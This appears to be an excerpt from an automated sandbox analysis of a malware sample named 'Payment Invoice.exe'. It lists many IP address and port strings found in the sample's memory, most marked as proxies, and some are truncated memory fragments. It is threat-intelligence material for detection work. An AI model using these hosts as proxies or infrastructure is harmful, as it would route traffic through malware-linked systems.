                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.134.150:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.134.150:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.157.1:9009
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.157.1:9009://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.105.202:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.105.202:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.214.250:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.214.250:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.219.10:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.219.10:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.164.209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.164.209.69:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.164.209.69:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.39.102:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.39.102:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.47.49:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.47.49:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.47.90:55443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.165.47.90:55443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.166.219.80:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.166.219.80:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.184.44:5430
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.184.44:5430://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.188.178:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.188.178:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.191.123.195:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.191.123.195:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.4.119.97:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.4.119.97:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.40.181.220:31247
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.40.181.220:31247://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.44.228.36:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.44.228.36:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.5.47.173:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.5.47.173:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.55.134.227:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.55.134.227:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.57.2.19
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.57.2.19://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.57.2.19:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.58.18.27:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.58.18.27:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.6.224.52:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.6.224.52:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.119.147.187
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.119.147.187://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.119.147.187:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.124.53.122:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.124.53.122:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.128.77.213:33378
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.128.77.213:333780q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.128.77.213:33378://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.150.172.151:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.150.172.151:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.153.125.13:65424
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.153.125.13:65424://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.153.125.14:65424
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.159.92.199:3080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.159.92.199:3080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.160.186.246:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.160.186.246:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.160.57.87:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.160.57.87:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.30.10:8765
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.30.10:8765://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:50640
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:50640://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:52903
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:52903://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:61070
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:61070://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.150
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.150.48:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.150.48:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.1500
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.205.34.58:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.205.34.58:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.218.172.225:8080://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.243.63.16
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.243.63.16://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.243.63.16:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.32.120.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.32.120.202://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.32.120.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.57.51.53
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.57.51.53://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.57.51.53:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.74.125.18:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.74.125.18:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CB7000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.103.117:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.103.117:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.117.74:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.117.74:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.77.239.201:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.77.239.201:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.79.29.198:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.79.29.198:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.89.8.107:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:15901
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:15901://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:43839
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:43839://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:48553
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:48553://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:55005
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:55005://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631968D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.196.184.69:50704
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.196.184.69:50704://proxy0ku
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.130.99.161:42350
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.130.99.161:42350://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163184CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.130.107:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.130.107:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49614
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49614://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:59867
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:59867://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:63625
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.15.100:54330x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.9.30:42331
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.9.30:42331://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.9.30:42331x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.42.27.113:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.42.27.113:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:17228
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:17228://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:37443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:37443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:42581
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:42581://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:60148
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:60148://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:36946
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:36946://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:37736
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:37736://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:39323
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:39323://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631840F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:39737
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:39737://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:45876
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:45876://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:48963
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:48963://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.255.174:19770
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.255.174:19770://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:22881
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:22881://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:42072
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163172D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:42072://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:46047
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:46047://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.180.202.147:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.180.202.147:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.87.131.240:41368
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.87.131.240:41368://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.121.164.50:31147
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.121.164.50:31147://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:15097
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:15097://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:40750
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:40750://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.6.159
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.6.159://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.6.159:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.10:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.10:10808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.10:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.8:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.8:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.142.64.219:39789
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.142.64.219:39789://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213://proxy
